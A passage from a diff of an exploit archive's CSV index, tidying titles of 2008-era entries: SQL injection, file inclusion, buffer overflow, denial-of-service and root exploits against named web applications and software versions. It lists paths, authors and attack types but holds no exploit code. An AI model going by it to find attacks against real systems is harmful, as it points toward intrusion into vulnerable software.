Injection",2008-02-15,S@BUN,php,webapps,0 5127,platforms/php/webapps/5127.txt,"WordPress Plugin Simple Forum 1.10-1.11 - SQL Injection",2008-02-15,S@BUN,php,webapps,0 -5128,platforms/php/webapps/5128.txt,"Mambo Component Quran <= 1.1 - (surano) SQL Injection",2008-02-15,Don,php,webapps,0 +5128,platforms/php/webapps/5128.txt,"Mambo Component Quran 1.1 - (surano) SQL Injection",2008-02-15,Don,php,webapps,0 5129,platforms/php/webapps/5129.txt,"TRUC 0.11.0 - (download.php) Remote File Disclosure",2008-02-16,GoLd_M,php,webapps,0 -5130,platforms/php/webapps/5130.txt,"AuraCMS 1.62 - Multiple Remote SQL Injection Exploit",2008-02-16,NTOS-Team,php,webapps,0 -5131,platforms/php/webapps/5131.pl,"Simple CMS <= 1.0.3 - (indexen.php area) Remote SQL Injection Exploit",2008-02-16,JosS,php,webapps,0 -5132,platforms/php/webapps/5132.txt,"Joomla Component jooget <= 2.6.8 - Remote SQL Injection",2008-02-16,S@BUN,php,webapps,0 -5133,platforms/php/webapps/5133.txt,"Mambo Component Ricette 1.0 - Remote SQL Injection",2008-02-16,S@BUN,php,webapps,0 -5134,platforms/php/webapps/5134.txt,"Joomla Component com_galeria Remote SQL Injection",2008-02-16,S@BUN,php,webapps,0 +5130,platforms/php/webapps/5130.txt,"AuraCMS 1.62 - Multiple SQL Injection Exploit",2008-02-16,NTOS-Team,php,webapps,0 +5131,platforms/php/webapps/5131.pl,"Simple CMS 1.0.3 - (indexen.php area) SQL Injection Exploit",2008-02-16,JosS,php,webapps,0 +5132,platforms/php/webapps/5132.txt,"Joomla Component jooget 2.6.8 - SQL Injection",2008-02-16,S@BUN,php,webapps,0 +5133,platforms/php/webapps/5133.txt,"Mambo Component Ricette 1.0 - SQL Injection",2008-02-16,S@BUN,php,webapps,0 +5134,platforms/php/webapps/5134.txt,"Joomla Component com_galeria SQL Injection",2008-02-16,S@BUN,php,webapps,0 5135,platforms/php/webapps/5135.txt,"WordPress Photo album Remote - SQL Injection",2008-02-16,S@BUN,php,webapps,0 5136,platforms/php/webapps/5136.txt,"PHPizabi 0.848b C1 HFP1 - Remote File Upload",2008-02-17,ZoRLu,php,webapps,0 5137,platforms/php/webapps/5137.txt,"XPWeb 3.3.2 - (Download.php url) Remote File Disclosure",2008-02-17,GoLd_M,php,webapps,0 @@ -4784,167 +4784,167 @@ id,file,description,date,author,platform,type,port 5144,platforms/windows/local/5144.c,"DESlock+ <= 3.2.6 - DLMFDISK.sys Local kernel ring0 SYSTEM Exploit",2008-02-18,mu-b,windows,local,0 5145,platforms/php/webapps/5145.txt,"Joomla Component com_pccookbook (user_id) SQL Injection",2008-02-18,S@BUN,php,webapps,0 5146,platforms/php/webapps/5146.txt,"Joomla Component com_clasifier (cat_id) SQL Injection",2008-02-18,S@BUN,php,webapps,0 -5147,platforms/php/webapps/5147.txt,"PHP-Nuke Module books SQL (cid) Remote SQL Injection",2008-02-18,S@BUN,php,webapps,0 -5148,platforms/php/webapps/5148.txt,"XOOPS Module myTopics (articleid) Remote SQL Injection",2008-02-18,S@BUN,php,webapps,0 +5147,platforms/php/webapps/5147.txt,"PHP-Nuke Module books SQL (cid) SQL Injection",2008-02-18,S@BUN,php,webapps,0 +5148,platforms/php/webapps/5148.txt,"XOOPS Module myTopics (articleid) SQL Injection",2008-02-18,S@BUN,php,webapps,0 5149,platforms/php/webapps/5149.txt,"sCssBoard - (pwnpack) Multiple Versions Remote Exploit",2008-02-18,Inphex,php,webapps,0 -5150,platforms/hardware/remote/5150.txt,"Thecus N5200Pro NAS Server Control Panel - RFI",2008-02-18,Crackers_Child,hardware,remote,0 +5150,platforms/hardware/remote/5150.txt,"Thecus N5200Pro NAS Server Control Panel - Remote File Inclusion",2008-02-18,Crackers_Child,hardware,remote,0 5151,platforms/osx/dos/5151.pl,"Apple iPhoto 4.0.3 DPAP Server Denial of Service Exploit",2008-02-18,"David Wharton",osx,dos,0 -5152,platforms/multiple/dos/5152.sh,"X.Org xorg-server <= 1.1.1-48.13 - Probe for Files Exploit PoC",2008-02-19,vl4dZ,multiple,dos,0 +5152,platforms/multiple/dos/5152.sh,"X.Org xorg-server 1.1.1-48.13 - Probe for Files Exploit PoC",2008-02-19,vl4dZ,multiple,dos,0 5153,platforms/windows/remote/5153.asp,"Ourgame GLWorld 2.x hgs_startNotify() ActiveX Buffer Overflow Exploit",2008-02-19,luoluo,windows,remote,0 -5154,platforms/php/webapps/5154.txt,"PHP-Nuke Module Sections (artid) Remote SQL Injection",2008-02-19,S@BUN,php,webapps,0 +5154,platforms/php/webapps/5154.txt,"PHP-Nuke Module Sections (artid) SQL Injection",2008-02-19,S@BUN,php,webapps,0 5155,platforms/php/webapps/5155.txt,"PHP-Nuke Module EasyContent (page_id) SQL Injection",2008-02-19,"Mehmet Ince",php,webapps,0 5156,platforms/php/webapps/5156.txt,"RunCMS Module MyAnnonces (cid) SQL Injection",2008-02-19,S@BUN,php,webapps,0 -5157,platforms/php/webapps/5157.txt,"XOOPS Module eEmpregos (cid) Remote SQL Injection",2008-02-19,S@BUN,php,webapps,0 -5158,platforms/php/webapps/5158.txt,"XOOPS Module classifieds (cid) Remote SQL Injection",2008-02-19,S@BUN,php,webapps,0 -5159,platforms/php/webapps/5159.txt,"PHP-Nuke Modules Okul 1.0 - (okulid) Remote SQL Injection",2008-02-20,"Mehmet Ince",php,webapps,0 +5157,platforms/php/webapps/5157.txt,"XOOPS Module eEmpregos (cid) SQL Injection",2008-02-19,S@BUN,php,webapps,0 +5158,platforms/php/webapps/5158.txt,"XOOPS Module classifieds (cid) SQL Injection",2008-02-19,S@BUN,php,webapps,0 +5159,platforms/php/webapps/5159.txt,"PHP-Nuke Modules Okul 1.0 - (okulid) SQL Injection",2008-02-20,"Mehmet Ince",php,webapps,0 5160,platforms/php/webapps/5160.txt,"Joomla Component com_hwdvideoshare SQL Injection",2008-02-20,S@BUN,php,webapps,0 5161,platforms/php/webapps/5161.txt,"PHP-Nuke Module Docum (artid) SQL Injection",2008-02-20,DamaR,php,webapps,0 5162,platforms/php/webapps/5162.txt,"Globsy 1.0 - (file) Remote File Disclosure",2008-02-20,GoLd_M,php,webapps,0 5163,platforms/php/webapps/5163.txt,"PHP-Nuke Module Inhalt (cid) SQL Injection",2008-02-20,Crackers_Child,php,webapps,0 5164,platforms/php/webapps/5164.php,"Woltlab Burning Board 3.0.x - Remote Blind SQL Injection Exploit",2008-02-20,NBBN,php,webapps,0 -5165,platforms/php/webapps/5165.php,"PunBB <= 1.2.16 - Blind Password Recovery Exploit",2008-02-21,EpiBite,php,webapps,0 -5166,platforms/php/webapps/5166.htm,"MultiCart 2.0 - (productdetails.php) Remote SQL Injection Exploit",2008-02-20,t0pP8uZz,php,webapps,0 -5167,platforms/linux/local/5167.sh,"X.Org xorg-x11-xfs <= 1.0.2-3.1 - Local Race Condition Exploit",2008-02-21,vl4dZ,linux,local,0 +5165,platforms/php/webapps/5165.php,"PunBB 1.2.16 - Blind Password Recovery Exploit",2008-02-21,EpiBite,php,webapps,0 +5166,platforms/php/webapps/5166.htm,"MultiCart 2.0 - (productdetails.php) SQL Injection Exploit",2008-02-20,t0pP8uZz,php,webapps,0 +5167,platforms/linux/local/5167.sh,"X.Org xorg-x11-xfs 1.0.2-3.1 - Local Race Condition Exploit",2008-02-21,vl4dZ,linux,local,0 5168,platforms/php/webapps/5168.txt,"PHP-Nuke Modules Manuales 0.1 - (cid) SQL Injection",2008-02-21,"Mehmet Ince",php,webapps,0 -5169,platforms/php/webapps/5169.txt,"PHP-Nuke Module Siir (id) Remote SQL Injection",2008-02-21,S@BUN,php,webapps,0 -5170,platforms/php/webapps/5170.txt,"BeContent 031 - (id) Remote SQL Injection",2008-02-21,Cr@zy_King,php,webapps,0 +5169,platforms/php/webapps/5169.txt,"PHP-Nuke Module Siir (id) SQL Injection",2008-02-21,S@BUN,php,webapps,0 +5170,platforms/php/webapps/5170.txt,"BeContent 031 - (id) SQL Injection",2008-02-21,Cr@zy_King,php,webapps,0 5171,platforms/php/webapps/5171.txt,"ossim 0.9.9rc5 - (XSS/SQL Injection) Multiple Vulnerabilities",2008-02-21,"Marcin Kopec",php,webapps,0 5172,platforms/php/webapps/5172.txt,"PHP-Nuke Module NukeC 2.1 - (id_catg) SQL Injection",2008-02-21,DamaR,php,webapps,0 5173,platforms/php/webapps/5173.txt,"phpQLAdmin 2.2.7 - Multiple Remote File Inclusion Vulnerabilities",2008-02-22,RoMaNcYxHaCkEr,php,webapps,0 5174,platforms/php/webapps/5174.txt,"Quantum Game Library 0.7.2c Remote File Inclusion Vulnerabilities",2008-02-22,RoMaNcYxHaCkEr,php,webapps,0 -5175,platforms/php/webapps/5175.txt,"phpProfiles 4.5.2 BETA - (body_comm.inc.php) RFI",2008-02-23,CraCkEr,php,webapps,0 -5176,platforms/php/webapps/5176.txt,"Quinsonnas Mail Checker 1.55 - (footer.php) RFI",2008-02-23,GoLd_M,php,webapps,0 +5175,platforms/php/webapps/5175.txt,"phpProfiles 4.5.2 BETA - (body_comm.inc.php) Remote File Inclusion",2008-02-23,CraCkEr,php,webapps,0 +5176,platforms/php/webapps/5176.txt,"Quinsonnas Mail Checker 1.55 - (footer.php) Remote File Inclusion",2008-02-23,GoLd_M,php,webapps,0 5177,platforms/php/webapps/5177.txt,"Joomla Component simple shop 2.0 - SQL Injection",2008-02-23,S@BUN,php,webapps,0 -5178,platforms/php/webapps/5178.txt,"Mambo Component garyscookbook <= 1.1.1 - SQL Injection",2008-02-23,S@BUN,php,webapps,0 +5178,platforms/php/webapps/5178.txt,"Mambo Component garyscookbook 1.1.1 - SQL Injection",2008-02-23,S@BUN,php,webapps,0 5179,platforms/php/webapps/5179.txt,"phpUserBase 1.3b (unverified.inc.php) Local File Inclusion",2008-02-23,BeyazKurt,php,webapps,0 5180,platforms/php/webapps/5180.txt,"phpUserBase 1.3b (unverified.inc.php) Remote File Inclusion",2008-02-24,CraCkEr,php,webapps,0 5181,platforms/php/webapps/5181.txt,"pigyard art gallery - Multiple Vulnerabilities",2008-02-24,ZoRLu,php,webapps,0 -5182,platforms/php/webapps/5182.txt,"Portail Web Php <= 2.5.1.1 - Multiple Inclusion Vulnerabilities",2008-02-24,GoLd_M,php,webapps,0 -5183,platforms/php/webapps/5183.txt,"php Download Manager <= 1.1 - Local File Inclusion",2008-02-24,BeyazKurt,php,webapps,0 +5182,platforms/php/webapps/5182.txt,"Portail Web Php 2.5.1.1 - Multiple Inclusion Vulnerabilities",2008-02-24,GoLd_M,php,webapps,0 +5183,platforms/php/webapps/5183.txt,"php Download Manager 1.1 - Local File Inclusion",2008-02-24,BeyazKurt,php,webapps,0 5184,platforms/windows/dos/5184.py,"MyServer 0.8.11 - (204 No Content) error Remote Denial of Service Exploit",2008-02-25,shinnai,windows,dos,0 -5185,platforms/asp/webapps/5185.txt,"PORAR WEBBOARD (question.asp) Remote SQL Injection",2008-02-25,xcorpitx,asp,webapps,0 +5185,platforms/asp/webapps/5185.txt,"PORAR WEBBOARD (question.asp) SQL Injection",2008-02-25,xcorpitx,asp,webapps,0 5186,platforms/php/webapps/5186.txt,"PHP-Nuke Module Kose_Yazilari (artid) SQL Injection",2008-02-25,xcorpitx,php,webapps,0 -5187,platforms/asp/webapps/5187.txt,"MiniNuke 2.1 - (members.asp uid) Remote SQL Injection",2008-02-25,S@BUN,asp,webapps,0 +5187,platforms/asp/webapps/5187.txt,"MiniNuke 2.1 - (members.asp uid) SQL Injection",2008-02-25,S@BUN,asp,webapps,0 5188,platforms/windows/remote/5188.html,"Rising Antivirus Online Scanner Insecure Method Flaw Exploit",2008-02-25,"John Smith",windows,remote,0 -5189,platforms/php/webapps/5189.pl,"DBHcms <= 1.1.4 - Remote File Inclusion Exploit",2008-02-25,Iron,php,webapps,0 +5189,platforms/php/webapps/5189.pl,"DBHcms 1.1.4 - Remote File Inclusion Exploit",2008-02-25,Iron,php,webapps,0 5190,platforms/windows/remote/5190.html,"Move Networks Quantum Streaming Player Control BoF Exploit",2008-02-26,Elazar,windows,remote,0 -5191,platforms/multiple/dos/5191.c,"Apple Mac OS X xnu <= 1228.3.13 - IPv6-ipcomp Remote kernel DoS PoC",2008-02-26,mu-b,multiple,dos,0 +5191,platforms/multiple/dos/5191.c,"Apple Mac OS X xnu 1228.3.13 - IPv6-ipcomp Remote kernel DoS PoC",2008-02-26,mu-b,multiple,dos,0 5192,platforms/php/webapps/5192.pl,"Nukedit 4.9.x - Remote Create Admin Exploit",2008-02-26,r3dm0v3,php,webapps,0 5193,platforms/windows/remote/5193.html,"D-Link MPEG4 SHM Audio Control (VAPGDecoder.dll 1.7.0.5) BoF Exploit",2008-02-26,rgod,windows,remote,0 5194,platforms/php/webapps/5194.txt,"WordPress Plugin Sniplets 1.1.2 - (RFI/XSS/RCE) Multiple Vulnerabilities",2008-02-26,NBBN,php,webapps,0 5195,platforms/php/webapps/5195.txt,"Mambo Component Simpleboard 1.0.3 - (catid) SQL Injection",2008-02-27,"it's my",php,webapps,0 -5196,platforms/php/webapps/5196.pl,"EazyPortal <= 1.0 - (COOKIE) Remote SQL Injection Exploit",2008-02-27,Iron,php,webapps,0 +5196,platforms/php/webapps/5196.pl,"EazyPortal 1.0 - (COOKIE) SQL Injection Exploit",2008-02-27,Iron,php,webapps,0 5197,platforms/php/webapps/5197.txt,"GROUP-E 1.6.41 - (head_auth.php) Remote File Inclusion",2008-02-27,CraCkEr,php,webapps,0 -5198,platforms/php/webapps/5198.txt,"Koobi Pro 5.7 - (categ) Remote SQL Injection",2008-02-28,Cr@zy_King,php,webapps,0 +5198,platforms/php/webapps/5198.txt,"Koobi Pro 5.7 - (categ) SQL Injection",2008-02-28,Cr@zy_King,php,webapps,0 5199,platforms/php/webapps/5199.txt,"SiteBuilderElite 1.2 - Multiple Remote File Inclusion Vulnerabilities",2008-02-28,MhZ91,php,webapps,0 -5200,platforms/php/webapps/5200.txt,"Podcast Generator <= 1.0 BETA 2 - RFI / File Disclosure Vulnerabilities",2008-02-28,GoLd_M,php,webapps,0 -5201,platforms/windows/dos/5201.txt,"Crysis <= 1.1.1.5879 - Remote Format String Denial of Service PoC",2008-02-28,"Long Poke",windows,dos,0 +5200,platforms/php/webapps/5200.txt,"Podcast Generator 1.0 BETA 2 - RFI / File Disclosure Vulnerabilities",2008-02-28,GoLd_M,php,webapps,0 +5201,platforms/windows/dos/5201.txt,"Crysis 1.1.1.5879 - Remote Format String Denial of Service PoC",2008-02-28,"Long Poke",windows,dos,0 5202,platforms/php/webapps/5202.txt,"barryvan compo manager 0.5pre-1 - Remote File Inclusion",2008-02-28,MhZ91,php,webapps,0 -5203,platforms/php/webapps/5203.txt,"PHP-Nuke My_eGallery <= 2.7.9 - Remote SQL Injection",2008-02-28,"Aria-Security Team",php,webapps,0 -5204,platforms/php/webapps/5204.py,"Centreon <= 1.4.2.3 - (get_image.php) Remote File Disclosure Exploit",2008-02-28,"Julien CAYSSOL",php,webapps,0 +5203,platforms/php/webapps/5203.txt,"PHP-Nuke My_eGallery 2.7.9 - SQL Injection",2008-02-28,"Aria-Security Team",php,webapps,0 +5204,platforms/php/webapps/5204.py,"Centreon 1.4.2.3 - (get_image.php) Remote File Disclosure Exploit",2008-02-28,"Julien CAYSSOL",php,webapps,0 5205,platforms/windows/remote/5205.html,"Symantec BackupExec Calendar Control (PVCalendar.ocx) BoF Exploit",2008-02-29,Elazar,windows,remote,0 -5206,platforms/php/webapps/5206.txt,"Koobi CMS 4.3.0 - 4.2.3 (categ) Remote SQL Injection",2008-02-29,JosS,php,webapps,0 -5207,platforms/php/webapps/5207.txt,"Mambo Component com_Musica (id) Remote SQL Injection",2008-03-01,"Aria-Security Team",php,webapps,0 -5208,platforms/php/webapps/5208.txt,"phpArcadeScript <= 3.0RC2 - (userid) SQL Injection",2008-03-01,"SoSo H H",php,webapps,0 -5209,platforms/php/webapps/5209.txt,"phpComasy 0.8 - (mod_project_id) Remote SQL Injection",2008-03-01,Cr@zy_King,php,webapps,0 +5206,platforms/php/webapps/5206.txt,"Koobi CMS 4.3.0 - 4.2.3 (categ) SQL Injection",2008-02-29,JosS,php,webapps,0 +5207,platforms/php/webapps/5207.txt,"Mambo Component com_Musica (id) SQL Injection",2008-03-01,"Aria-Security Team",php,webapps,0 +5208,platforms/php/webapps/5208.txt,"phpArcadeScript 3.0RC2 - (userid) SQL Injection",2008-03-01,"SoSo H H",php,webapps,0 +5209,platforms/php/webapps/5209.txt,"phpComasy 0.8 - (mod_project_id) SQL Injection",2008-03-01,Cr@zy_King,php,webapps,0 5210,platforms/linux/dos/5210.c,"Galaxy FTP Server 1.0 - (Neostrada Livebox DSL Router) DoS Exploit",2008-03-01,0in,linux,dos,0 -5211,platforms/php/webapps/5211.txt,"Dynamic photo gallery 1.02 - (albumID) Remote SQL Injection",2008-03-01,"Aria-Security Team",php,webapps,0 +5211,platforms/php/webapps/5211.txt,"Dynamic photo gallery 1.02 - (albumID) SQL Injection",2008-03-01,"Aria-Security Team",php,webapps,0 5212,platforms/windows/remote/5212.py,"MiniWebSvr 0.0.9a Remote Directory Transversal",2008-03-03,gbr,windows,remote,0 -5213,platforms/windows/remote/5213.txt,"Versant Object Database <= 7.0.1.3 - Commands Execution Exploit",2008-03-04,"Luigi Auriemma",windows,remote,0 -5214,platforms/php/webapps/5214.txt,"Mitra Informatika Solusindo cart Remote SQL Injection",2008-03-04,bius,php,webapps,0 +5213,platforms/windows/remote/5213.txt,"Versant Object Database 7.0.1.3 - Commands Execution Exploit",2008-03-04,"Luigi Auriemma",windows,remote,0 +5214,platforms/php/webapps/5214.txt,"Mitra Informatika Solusindo cart SQL Injection",2008-03-04,bius,php,webapps,0 5215,platforms/multiple/remote/5215.txt,"Ruby 1.8.6 - (Webrick Httpd 1.3.1) Directory Traversal",2008-03-06,DSecRG,multiple,remote,0 -5216,platforms/php/webapps/5216.txt,"XOOPS Module Glossario 2.2 - (sid) Remote SQL Injection",2008-03-06,S@BUN,php,webapps,0 +5216,platforms/php/webapps/5216.txt,"XOOPS Module Glossario 2.2 - (sid) SQL Injection",2008-03-06,S@BUN,php,webapps,0 5217,platforms/windows/dos/5217.html,"ICQ Toolbar 2.3 - ActiveX Remote Denial of Service Exploit",2008-03-06,spdr,windows,dos,0 -5218,platforms/php/webapps/5218.txt,"XOOPS Module wfdownloads (cid) Remote SQL Injection",2008-03-06,S@BUN,php,webapps,0 +5218,platforms/php/webapps/5218.txt,"XOOPS Module wfdownloads (cid) SQL Injection",2008-03-06,S@BUN,php,webapps,0 5219,platforms/php/webapps/5219.php,"zKup CMS 2.0 <= 2.3 - Remote Add Admin Exploit",2008-03-07,"Charles Fol",php,webapps,0 5220,platforms/php/webapps/5220.php,"zKup CMS 2.0 <= 2.3 - Remote Upload Exploit",2008-03-07,"Charles Fol",php,webapps,0 5221,platforms/php/webapps/5221.txt,"Joomla Component Candle 1.0 - (cID) SQL Injection",2008-03-08,S@BUN,php,webapps,0 -5222,platforms/php/webapps/5222.txt,"QuickTicket <= 1.5 - (qti_usr.php id) SQL Injection",2008-03-09,croconile,php,webapps,0 -5223,platforms/php/webapps/5223.txt,"BM Classifieds <= 20080409 - Multiple SQL Injection Vulnerabilities",2008-03-09,xcorpitx,php,webapps,0 -5224,platforms/linux/remote/5224.php,"VHCS <= 2.4.7.1 - (vhcs2_daemon) Remote Root Exploit",2008-03-09,DarkFig,linux,remote,0 +5222,platforms/php/webapps/5222.txt,"QuickTicket 1.5 - (qti_usr.php id) SQL Injection",2008-03-09,croconile,php,webapps,0 +5223,platforms/php/webapps/5223.txt,"BM Classifieds 20080409 - Multiple SQL Injection Vulnerabilities",2008-03-09,xcorpitx,php,webapps,0 +5224,platforms/linux/remote/5224.php,"VHCS 2.4.7.1 - (vhcs2_daemon) Remote Root Exploit",2008-03-09,DarkFig,linux,remote,0 5225,platforms/windows/dos/5225.html,"KingSoft UpdateOcx2.dll SetUninstallName() Heap Overflow PoC",2008-03-10,void,windows,dos,0 5226,platforms/php/webapps/5226.txt,"Mambo Component eWriting 1.2.1 - (cat) SQL Injection",2008-03-10,Don,php,webapps,0 5227,platforms/solaris/local/5227.c,"Solaris 8/9/10 - fifofs I_PEEK Local Kernel Memory Leak Exploit",2008-03-10,"Marco Ivaldi",solaris,local,0 5228,platforms/windows/remote/5228.txt,"acronis pxe server 2.0.0.1076 - Directory Traversal / null pointer Vulnerabilities",2008-03-10,"Luigi Auriemma",windows,remote,0 -5229,platforms/multiple/dos/5229.txt,"asg-sentry <= 7.0.0 - Multiple Vulnerabilities",2008-03-10,"Luigi Auriemma",multiple,dos,0 -5230,platforms/windows/remote/5230.txt,"argon client management services <= 1.31 - Directory Traversal",2008-03-10,"Luigi Auriemma",windows,remote,0 -5231,platforms/php/webapps/5231.php,"phpMyNewsletter <= 0.8b5 - (archives.php msg_id) SQL Injection Exploit",2008-03-10,"Charles Fol",php,webapps,0 -5232,platforms/php/webapps/5232.txt,"Mapbender <= 2.4.4 - (mapFiler.php) Remote Code Execution",2008-03-11,"RedTeam Pentesting",php,webapps,0 -5233,platforms/php/webapps/5233.txt,"Mapbender 2.4.4 - (gaz) Remote SQL Injection",2008-03-11,"RedTeam Pentesting",php,webapps,0 -5234,platforms/php/webapps/5234.txt,"Bloo <= 1.00 - Multiple Remote SQL Injection Vulnerabilities",2008-03-11,MhZ91,php,webapps,0 +5229,platforms/multiple/dos/5229.txt,"asg-sentry 7.0.0 - Multiple Vulnerabilities",2008-03-10,"Luigi Auriemma",multiple,dos,0 +5230,platforms/windows/remote/5230.txt,"argon client management services 1.31 - Directory Traversal",2008-03-10,"Luigi Auriemma",windows,remote,0 +5231,platforms/php/webapps/5231.php,"phpMyNewsletter 0.8b5 - (archives.php msg_id) SQL Injection Exploit",2008-03-10,"Charles Fol",php,webapps,0 +5232,platforms/php/webapps/5232.txt,"Mapbender 2.4.4 - (mapFiler.php) Remote Code Execution",2008-03-11,"RedTeam Pentesting",php,webapps,0 +5233,platforms/php/webapps/5233.txt,"Mapbender 2.4.4 - (gaz) SQL Injection",2008-03-11,"RedTeam Pentesting",php,webapps,0 +5234,platforms/php/webapps/5234.txt,"Bloo 1.00 - Multiple SQL Injection Vulnerabilities",2008-03-11,MhZ91,php,webapps,0 5235,platforms/windows/dos/5235.py,"MailEnable SMTP Service - VRFY/EXPN Command Buffer Overflow DoS",2008-03-11,ryujin,windows,dos,0 -5236,platforms/php/webapps/5236.txt,"phpBB Mod FileBase (id) Remote SQL Injection",2008-03-11,t0pP8uZz,php,webapps,0 -5237,platforms/php/webapps/5237.txt,"Joomla Component ProductShowcase <= 1.5 - SQL Injection",2008-03-11,S@BUN,php,webapps,0 +5236,platforms/php/webapps/5236.txt,"phpBB Mod FileBase (id) SQL Injection",2008-03-11,t0pP8uZz,php,webapps,0 +5237,platforms/php/webapps/5237.txt,"Joomla Component ProductShowcase 1.5 - SQL Injection",2008-03-11,S@BUN,php,webapps,0 5238,platforms/windows/remote/5238.py,"Motorola Timbuktu Pro 8.6.5/8.7 Path Traversal / Log Injection Exploit",2008-03-11,"Core Security",windows,remote,0 -5239,platforms/php/webapps/5239.php,"Danneo CMS <= 0.5.1 - Remote Blind SQL Injection Exploit",2008-03-11,InATeam,php,webapps,0 -5240,platforms/php/webapps/5240.htm,"QuickTalk Forum <= 1.6 - Remote Blind SQL Injection Exploit",2008-03-12,t0pP8uZz,php,webapps,0 -5241,platforms/php/webapps/5241.txt,"XOOPS Module Gallery 0.2.2 - (gid) Remote SQL Injection",2008-03-12,S@BUN,php,webapps,0 +5239,platforms/php/webapps/5239.php,"Danneo CMS 0.5.1 - Remote Blind SQL Injection Exploit",2008-03-11,InATeam,php,webapps,0 +5240,platforms/php/webapps/5240.htm,"QuickTalk Forum 1.6 - Remote Blind SQL Injection Exploit",2008-03-12,t0pP8uZz,php,webapps,0 +5241,platforms/php/webapps/5241.txt,"XOOPS Module Gallery 0.2.2 - (gid) SQL Injection",2008-03-12,S@BUN,php,webapps,0 5242,platforms/php/webapps/5242.txt,"XOOPS Module My_eGallery 3.04 - (gid) SQL Injection",2008-03-12,S@BUN,php,webapps,0 -5243,platforms/php/webapps/5243.txt,"Fully Modded phpBB (kb.php) Remote SQL Injection",2008-03-12,TurkishWarriorr,php,webapps,0 -5244,platforms/php/webapps/5244.txt,"eXV2 Module bamaGalerie 3.03 - Remote SQL Injection",2008-03-12,S@BUN,php,webapps,0 +5243,platforms/php/webapps/5243.txt,"Fully Modded phpBB (kb.php) SQL Injection",2008-03-12,TurkishWarriorr,php,webapps,0 +5244,platforms/php/webapps/5244.txt,"eXV2 Module bamaGalerie 3.03 - SQL Injection",2008-03-12,S@BUN,php,webapps,0 5245,platforms/php/webapps/5245.txt,"XOOPS Module tutorials (printpage.php) SQL Injection",2008-03-12,S@BUN,php,webapps,0 -5246,platforms/php/webapps/5246.txt,"easycalendar <= 4.0tr - Multiple Vulnerabilities",2008-03-12,JosS,php,webapps,0 -5247,platforms/php/webapps/5247.txt,"easygallery <= 5.0tr - Multiple Vulnerabilities",2008-03-12,JosS,php,webapps,0 +5246,platforms/php/webapps/5246.txt,"easycalendar 4.0tr - Multiple Vulnerabilities",2008-03-12,JosS,php,webapps,0 +5247,platforms/php/webapps/5247.txt,"easygallery 5.0tr - Multiple Vulnerabilities",2008-03-12,JosS,php,webapps,0 5248,platforms/windows/remote/5248.py,"MDaemon IMAP server 9.6.4 - (FETCH) Remote Buffer Overflow Exploit",2008-03-13,ryujin,windows,remote,143 -5249,platforms/windows/remote/5249.pl,"MailEnable Pro/Ent <= 3.13 - (Fetch) post-auth Remote BoF Exploit",2008-03-14,haluznik,windows,remote,0 -5250,platforms/windows/local/5250.cpp,"VLC <= 0.8.6e Subtitle Parsing Local Buffer Overflow Exploit",2008-03-14,"Mai Xuan Cuong",windows,local,0 -5252,platforms/php/webapps/5252.txt,"eXV2 Module MyAnnonces - (lid) Remote SQL Injection",2008-03-14,S@BUN,php,webapps,0 -5253,platforms/php/webapps/5253.txt,"eXV2 Module eblog 1.2 - (blog_id) Remote SQL Injection",2008-03-14,S@BUN,php,webapps,0 -5254,platforms/php/webapps/5254.txt,"eXV2 Module Viso <= 2.0.4.3 - (kid) Remote SQL Injection",2008-03-14,S@BUN,php,webapps,0 -5255,platforms/php/webapps/5255.txt,"eXV2 Module WebChat 1.60 - (roomid) Remote SQL Injection",2008-03-14,S@BUN,php,webapps,0 -5256,platforms/php/webapps/5256.pl,"AuraCMS <= 2.2.1 - (online.php) Remote Blind SQL Injection Exploit",2008-03-14,NTOS-Team,php,webapps,0 +5249,platforms/windows/remote/5249.pl,"MailEnable Pro/Ent 3.13 - (Fetch) post-auth Remote BoF Exploit",2008-03-14,haluznik,windows,remote,0 +5250,platforms/windows/local/5250.cpp,"VLC 0.8.6e Subtitle Parsing Local Buffer Overflow Exploit",2008-03-14,"Mai Xuan Cuong",windows,local,0 +5252,platforms/php/webapps/5252.txt,"eXV2 Module MyAnnonces - (lid) SQL Injection",2008-03-14,S@BUN,php,webapps,0 +5253,platforms/php/webapps/5253.txt,"eXV2 Module eblog 1.2 - (blog_id) SQL Injection",2008-03-14,S@BUN,php,webapps,0 +5254,platforms/php/webapps/5254.txt,"eXV2 Module Viso 2.0.4.3 - (kid) SQL Injection",2008-03-14,S@BUN,php,webapps,0 +5255,platforms/php/webapps/5255.txt,"eXV2 Module WebChat 1.60 - (roomid) SQL Injection",2008-03-14,S@BUN,php,webapps,0 +5256,platforms/php/webapps/5256.pl,"AuraCMS 2.2.1 - (online.php) Remote Blind SQL Injection Exploit",2008-03-14,NTOS-Team,php,webapps,0 5257,platforms/multiple/remote/5257.py,"Dovecot IMAP 1.0.10 <= 1.1rc2 - Remote Email Disclosure Exploit",2008-03-14,kingcope,multiple,remote,0 5258,platforms/solaris/dos/5258.c,"SunOS 5.10 Sun Cluster rpc.metad Denial of Service PoC",2008-03-14,kingcope,solaris,dos,0 5259,platforms/windows/remote/5259.py,"NetWin Surgemail 3.8k4-4 - IMAP post-auth Remote LIST Universal Exploit",2008-03-14,ryujin,windows,remote,143 -5260,platforms/php/webapps/5260.txt,"fuzzylime CMS <= 3.01 - (admindir) Remote File Inclusion",2008-03-14,irk4z,php,webapps,0 +5260,platforms/php/webapps/5260.txt,"fuzzylime CMS 3.01 - (admindir) Remote File Inclusion",2008-03-14,irk4z,php,webapps,0 5261,platforms/windows/dos/5261.py,"Rosoft Media Player 4.1.8 RML Stack Based Buffer Overflow PoC",2008-03-15,"Wiktor Sierocinski",windows,dos,0 -5262,platforms/php/webapps/5262.txt,"mutiple timesheets <= 5.0 - Multiple Vulnerabilities",2008-03-16,JosS,php,webapps,0 -5263,platforms/php/webapps/5263.txt,"phpBP <= RC3 (2.204) FIX4 - Remote SQL Injection",2008-03-16,irk4z,php,webapps,0 +5262,platforms/php/webapps/5262.txt,"mutiple timesheets 5.0 - Multiple Vulnerabilities",2008-03-16,JosS,php,webapps,0 +5263,platforms/php/webapps/5263.txt,"phpBP RC3 (2.204) FIX4 - SQL Injection",2008-03-16,irk4z,php,webapps,0 5264,platforms/windows/remote/5264.html,"CA BrightStor ARCserve Backup r11.5 - ActiveX Remote BoF Exploit",2008-03-16,h07,windows,remote,0 5265,platforms/php/webapps/5265.txt,"Exero CMS 1.0.1 - (theme) Multiple Local File Inclusion Vulnerabilities",2008-03-17,GoLd_M,php,webapps,0 -5266,platforms/php/webapps/5266.txt,"PHPauction GPL Enhanced 2.51 - Multiple RFI Vulnerabilities",2008-03-17,RoMaNcYxHaCkEr,php,webapps,0 -5267,platforms/php/webapps/5267.txt,"XOOPS Module Dictionary <= 0.94 - Remote SQL 